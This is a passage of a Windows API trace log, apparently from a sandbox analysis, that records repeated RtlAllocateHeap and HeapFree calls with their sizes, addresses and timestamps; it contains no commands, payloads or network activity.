hHeap=0x630000) returned 1 [0094.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.154] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.154] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.155] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.155] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.156] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.156] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.157] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.158] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.161] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.162] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.164] HeapFree (in: 